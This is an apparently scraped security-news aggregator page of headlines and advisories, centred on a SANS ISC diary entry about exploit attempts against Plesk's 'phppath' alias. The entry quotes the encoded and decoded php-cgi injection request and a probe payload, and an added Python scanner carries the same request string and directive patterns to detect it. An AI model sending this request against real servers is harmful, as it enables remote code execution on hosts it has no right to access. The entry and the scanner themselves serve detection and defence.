Hackin9
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
A variety of network-controlled home automation devices lack basic security controls, making it possible for attackers to access their sensitive functions, often from the Internet, according to researchers from security firm Trustwave.
 
Researchers in the U.S. have managed to spoof GPS (Global Positioning System) signals to send a yacht hundreds of meters off course, while fooling the crew into thinking the yacht was remaining perfectly on course.
 

The Trials of Bradley Manning
The Nation.
There was no security to speak of at the SCIF (sensitive compartmented information facility) at FOB Hammer, where the “infosec” (information security) protocols were casually flouted with the full knowledge of supervisors. This was not an anomaly: 1.4 ...

 

Thanks to a reader for sending in this log entry from his Apache Server:

POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E
%63%6C%75%64%65%3D%6F
%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E
%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E
%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F
%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A
%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1

Russ quickly decoded it to:

/phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n

This appears to be an exploit attempt against Plesk, a popular hosting management platform. A patch for this vulnerability was released in June [1]. We covered the vulnerability before [2], but continue to see exploit attempts like the one above. The exploit takes advantage of a configuration error that creates the script alias "phppath", which can be used to execute shell commands via php. The request above passes a one-liner of php command-line options (-d directives) that accomplishes the following:

  • allow URL includes, so that remote files can be included
  • turn off safe mode to disable various protections
  • turn off the suhosin patch (put it into "simulation mode" so it doesn't block anything)
  • set "disable_functions" to an empty string to override any such setting in your php configuration file
  • auto-prepend "php://input", which executes any php script submitted as the body of this request

Please let us know if you are able to capture the body of the request!

Thanks to another reader for submitting a packet capture of a full request:

The Headers:

Host: <IP Address>
Content-Type: application/x-ww-forum-urlencoded
Content-Lenght: 64

<?php echo "Content-Type: text/html\r\n\r\n"; echo "___2pac\n"; ?>

This payload just prints the string ___2pac, likely to detect whether the vulnerability exists. No User-Agent header is sent, which should make it easy to block these requests using standard mod_security rules.
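As an added example (not part of the diary or of Plesk), a small Python log scanner that decodes the percent-encoded request target the way Russ did and flags Apache combined-format lines matching this exploit pattern, also noting the missing User-Agent the diary suggests blocking on. The log lines and IP addresses are constructed; the first line reuses the encoded target from the entry above.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# php-cgi directives the captured request injects with "-d"; any one of them is enough to flag
SUSPICIOUS_DIRECTIVES = ("allow_url_include=on", "auto_prepend_file=php://input",
                         "safe_mode=off", "disable_functions=", "open_basedir=none")

# Constructed sample log lines; the first reuses the encoded request target from the diary entry
ENCODED_TARGET = (
    "/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E"
    "%63%6C%75%64%65%3D%6F"
    "%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E"
    "%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E"
    "%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F"
    "%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A"
    "%2F%2F%69%6E%70%75%74+%2D%6E"
)
SAMPLE_LOG = [
    f'192.0.2.10 - - [30/Jul/2013:10:00:00 +0000] "POST {ENCODED_TARGET} HTTP/1.1" 200 64 "-" "-"',
    '192.0.2.11 - - [30/Jul/2013:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [30/Jul/2013:10:00:02 +0000] "GET /phppath/php?-d+foo=bar HTTP/1.1" 404 0 "-" "curl/7.0"',
]

def decode_target(target):
    """Percent-decode the request target; '+' becomes a space, giving the form Russ decoded to."""
    return unquote_plus(target)

def is_phppath_exploit(decoded_target):
    """True when the request hits the Plesk 'phppath' alias and passes php-cgi '-d' directives."""
    path, _, query = decoded_target.partition("?")
    return (path.startswith("/phppath/") and "-d " in query
            and any(d in query for d in SUSPICIOUS_DIRECTIVES))

def scan_log(lines):
    """Return (host, decoded target, user-agent missing?) for each flagged log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not combined format; skip rather than guess
        decoded = decode_target(m.group("target"))
        if is_phppath_exploit(decoded):
            hits.append((m.group("host"), decoded, m.group("ua") in ("", "-")))
    return hits
```

The third sample line hits the alias with a harmless directive and is deliberately not flagged, so the check keys on the injected php settings rather than on the path alone.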

 

[1] http://kb.parallels.com/en/116241
[2] https://isc.sans.edu/diary/Plesk+0-day+Real+or+not+/15950

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

 
RETIRED: YUI CVE-2013-4939 Multiple Cross-Site Scripting Vulnerabilities
 
Researchers in Silicon Valley have managed to observe electrical switching that is thousands of times faster than transistors used in today's computer chips. Their work could lead to a better understanding of how transistors work at the atomic level and in turn help to enable more powerful computers.
 
Marvell joined the crowd of vendors throwing their support behind Googles TV streaming device, Chromecast, saying its hardware powers the new device.
 
Intel has shipped its first "open source PC," a bare-bones computer aimed at software developers building x86 applications and hobbyists looking to construct their own computer.
 
Corning has had much success in getting its Gorilla Glass adopted by smartphone and tablet makers. Now it's aiming for laptops.
 
Ready to quietly mug your network: the Pwn Plug R2.
Pwnie Express

Tomorrow at the Black Hat security conference in Las Vegas, the Pwnie Express will officially unleash Pwn Plug R2, the next generation in its arsenal of penetration testing and hacking hardware. Ars got an exclusive rundown in advance on the device from Dave Porcello, founder and CEO of Pwnie Express.

The new Pwn Plug looks less like a DC power supply plug—the form factor of its predecessor—and more like a small Wi-Fi access point or router. But inside, it's really a Linux-powered NSA-in-a-box, providing white hat hackers and corporate network security professionals a "drop box" system that can be remotely controlled over a covert Internet channel or a cellular data connection.

"Some people will use these for physical penetration tests," Porcello said. "They can go into a bank branch or a retail store, or even a corp office, and pretend to be a telecom technician or someone from the power company, or whatever, and drop it under someone's desk, or in a wiring closet, or behind a printer." And for other applications, such as corporate security auditing, Porcello said, "it's just as useful to send to remote sites without having to travel—a corporate security manager can just ship a box out to a retail store and have a store manager or branch manager just plug it in."


    


 
YUI CVE-2013-4939 Multiple Cross-Site Scripting Vulnerabilities
 
Wireshark Multiple Denial of Service Vulnerabilities
 
For ARI CEO Carl Ortell, real-time information delivery is key to strong relationships with customers and employees.
 
Microsoft today said that Windows 8.1, slated for release this fall, will use the same lifecycle support timeline as 2012's Windows 8, meaning that it will be supported until early 2023.
 
Facebook today announced a pilot program aimed at helping developers take their mobile games global.
 

thank you

 
Both Apple- and Windows-branded tablets lost market share in the second quarter, each retreating in the face of increased pressure from Android, a market research analyst said today.
 
Even Asus, which makes the VivoTab RT tablet, isn't impressed with the sales results of Microsoft Windows RT-based tablets.
 
Samsung is reportedly in talks to acquire German organic light-emitting diode (OLED) technology developer Novaled.
 
Lenovo will open its Reach consumer cloud service beta to anyone who wants to sign up later this quarter in North America, which could boost the Chinese company's hardware sales by tying that portfolio to the cloud service.
 
Oracle has settled a lawsuit it brought last year against a former partner it alleged was providing third-party support for its PeopleSoft application in an illegal fashion.
 
If it wasn't already apparent, next-generation Windows RT tablets are not getting support from any tablet maker other than Microsoft itself.
 
The Massachusetts Institute of Technology never sought a federal prosecution of Aaron Swartz, the programming prodigy who was charged with stealing millions of academic papers from an online archive at MIT, according to a report by the institute.
 
Military Judge Col. Denise Lind has acquitted Private First Class Bradley Manning of aiding U.S. enemies, but found him guilty of most lesser charges related to leaking secret documents to WikiLeaks.
 
This CIO wants IT employees who are dedicated to the company's mission of using IT to fight healthcare fraud and waste.
 
NGS00500 Technical Advisory: Bit51 Better WP Security Plugin - Unauthenticated Stored XSS to RCE
 
Red Hat Directory Server and 389 Directory Server CVE-2013-2219 Access Bypass Vulnerability
 
[ MDVSA-2013:204 ] wireshark
 
MojoPortal XSS
 
[ MDVSA-2013:203 ] phpmyadmin
 
Elemata CMS 'id' Parameter SQL Injection Vulnerability
 
Mintboard Multiple Cross Site Scripting Vulnerabilities
 
Top Games Script 'play.php' SQL Injection Vulnerability
 
The U.S. smartphone market is about to get more crowded, as Asustek Computer -- maker of the Nexus 7 tablet -- could have an entry as early as 2014.
 
Easing the path for organizations to launch big data-styled services, Red Hat has coupled the 10gen MongoDB data store to its new identity management package for the Red Hat Enterprise Linux (RHEL) distribution.
 
WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities
 
WorldCIST'14 - World Conference on IST, 15 - 18 April 2014, at Madeira Island
 
[SECURITY] [DSA 2731-1] libgcrypt11 security update
 
[SECURITY] [DSA 2730-1] gnupg security update
 
[security bulletin] HPSBGN02904 rev.1 - HP SiteScope running SOAP, Remote Code Execution
 
The CIO of the largest privately held spirits company in the world stays close to customers and recently deployed an iPad app that explains the rich history of its brands.
 
Salesforce.com has expanded the number of mobile application development tools it supports and also created a series of templates aimed at helping coders create mobile applications faster.
 
How do you find the right IT consultant for your business and specific IT needs? IT executives share their tips and advice on finding the right IT consultant for your organization. We also suggest five questions you should ask all prospective candidates.
 
phpMyAdmin Multiple SQL Injection and Cross Site Scripting Vulnerabilities
 

Remote Workers' Success Starts With IT Support
Fox Business
Allan Pratt, an InfoSec strategist and Computing Technology Industry Association (CompTIA) certification instructor, said that if employees spend a great deal of time traveling or working in public work spaces, it is best to invest in VPN. "VPNs can be ...

 
Sprint Nextel reported a $1.6 billion loss in the second quarter, swollen by the cost of shutting down its Nextel wireless network, but the company is more optimistic about future profitability.
 
The company could rediscover relevance because it understands that the companies using its cloud services require flexibility first and foremost.
 
In the two years it's been around, Google+ has both grown and changed. In the first of three "how-to" guides, we tell you how to get started.
 
In the ongoing quest for faster access to data, Diablo Technologies has taken what could be a significant next step.
 
The announcement appeared in small text on the Russian president's website: 'Let me speak from my heart: Edward Snowden is a Russian Citizen. Thanks to @homakov!';
 
Startup Muzik today announced its first headphones, which it said will be able to instantly post the music users are listening to on Twitter and Facebook as well as learn the music you like and create playlists.
 
What if the NSA took your text message metadata and made a flowing, colorful diagram with a timeline?
 
HTC plans to introduce a series of mid-tier and entry-level smartphones later this year as a way to regain market share, after posting disappointing financial results in the second quarter.
 
Microsoft is expanding the push for so-called 'white spaces' broadband to South Africa, where it will help to deploy the technology in a pilot project serving five primary and secondary schools.
 
PineApp Mail-SeCure 'test_li_connection.php' Remote Command Injection Vulnerability
 
PineApp Mail-SeCure 'ldapsyncnow.php' Remote Command Injection Vulnerability
 
PineApp Mail-SeCure 'livelog.html' Remote Command Injection Vulnerability
 

Posted by InfoSec News on Jul 30

http://healthitsecurity.com/2013/07/29/ohsu-alerts-patients-of-google-cloud-security-concerns/

By Patrick Ouellette
HealthITSecurity.com
July 29, 2013

In a rare data patient privacy issue involving patient data stored in the
cloud, Oregon Health and Science University (OHSU) alerted 3,044 patients
on July 26 that it had stored their data using a non-business associate
(BA) in Internet-based service provider Google.

According to OHSU, Google...
 

Posted by InfoSec News on Jul 30

http://www.theguardian.com/technology/2013/jul/30/car-hacking-ignition-injunction

By Lisa O'Carroll
theguardian.com
30 July 2013

The University of Birmingham says it will defer any publication of an
academic paper which reveals secret codes to bypass the security on
top-end cars including Porsches and Bentleys following a high court
injunction.

It said it was "disappointed" with the judgement in a statement following
the...
 

Posted by InfoSec News on Jul 30

http://news.cnet.com/8301-1009_3-57596053-83/nasa-falls-short-on-its-cloud-computing-security/

By Dara Kerr
Security & Privacy CNET News
July 29, 2013

In its move to cloud computing, NASA has experienced some difficulties
meeting security guidelines. A new report by the agency's Office of the
Inspector General says that NASA needs to work on strengthening its
information technology security practices.

"We found that weaknesses...
 

Posted by InfoSec News on Jul 30

http://www.v3.co.uk/v3-uk/news/2285459/nato-urges-military-to-recruit-white-hat-hacker-army-to-boost-defences

By Alastair Stevenson
V3.co.uk
29 Jul 2013

Nato has called for military and private industry to recruit more ethical
hackers, listing their skills as an essential weapon in its ongoing
anti-black hat war.

Nato deputy assistant secretary general Jamie Shea issued the statement in
a video review exploring the ethical hacking community....
 

Posted by InfoSec News on Jul 30

http://www.theregister.co.uk/2013/07/29/symantec_web_gateway_vulns_fixed/

By John Leyden
The Register
29th July 2013

Symantec has plugged a series of critical flaws in its Web Gateway appliances
which included a backdoor permitting remote code execution on targeted
systems.

The flaws, discovered during a short crash test by security researchers at
Austrian firm SEC Consult, created a means to execute code with root
privileges - or the...
 
Oracle Java SE CVE-2013-2470 Memory Corruption Vulnerability
 
ISC BIND 9 DNS RDATA Handling CVE-2013-4854 Remote Denial of Service Vulnerability
 
Internet Storm Center Infocon Status